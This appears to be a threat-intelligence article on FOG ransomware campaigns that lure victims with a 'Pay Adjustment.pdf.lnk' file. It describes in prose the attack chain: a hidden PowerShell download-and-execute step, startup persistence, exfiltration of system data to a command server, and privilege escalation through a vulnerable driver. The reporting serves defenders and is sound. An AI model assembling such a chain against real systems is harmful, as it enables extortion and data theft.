Phishing Campaign Delivers FOG Ransomware via Fake “Pay Adjustment” Notices

Tracking the FOG ransomware gang has identified a continued escalation in its activity since its emergence, targeting a range of industries with phishing-based campaigns. Trend Micro reporting discovered 173 instances of FOG-attributed ransomware activity since June 2024 against its customer base. Victims identified through the group’s leak site span sectors including technology, manufacturing, education, transportation, business services, healthcare, and retail. The ransomware encrypts data with a .flocked extension and drops a ransom note masquerading as communication from the “Department of Government Efficiency (DOGE).” Between January and March 2025, the group claimed 100 victims, peaking at 53 in February. The payloads observed in recent campaigns suggest either continued operations by FOG or repackaging of the ransomware by other actors.

Trend Micro's analysis of the infection chain reveals that initial access is achieved through phishing emails delivering a ZIP archive named "Pay Adjustment.zip." Inside the archive is a Windows shortcut file using a double extension, "Pay Adjustment.pdf.lnk," to appear as a benign document. Upon execution, the .lnk file launches "cmd.exe" with parameters that invoke PowerShell in a hidden window using the "-WindowStyle Hidden" flag. The PowerShell command uses "Invoke-WebRequest" (iwr) to download and execute "stage1.ps1" via "Invoke-Expression" (IEX). This initial script employs "attrib" to hide payload components and triggers a multi-stage delivery, ultimately retrieving a loader (cwiper.exe), a privilege escalation tool (ktool.exe), and secondary scripts. Persistence is achieved by placing files in startup directories, and political videos are opened as a decoy.

The "stage1.ps1" script distinguishes between standard and elevated privileges, placing ransomware payloads in appropriate startup locations and executing them silently. It collects system-level data via "lootsubmit.ps1," which performs geolocation via the Wigle API and sends hardware details to a command-and-control domain. The attacker’s toolkit also includes "trackerjacker.ps1," which refines MAC address resolution and obfuscates code via XOR encoding. Privilege escalation is conducted using "ktool.exe," which abuses the vulnerable "iQVW64.sys" driver. The ransomware loader embeds the encrypted payload within its data section and decrypts it with a hardcoded key, dropping both a ransom note (readme.txt) and an event logger ("dbgLog.sys"). Attribution to FOG ransomware is based on identical ransom notes found across variants, all instructing victims to access a Tor-based portal and referencing DOGE-related language.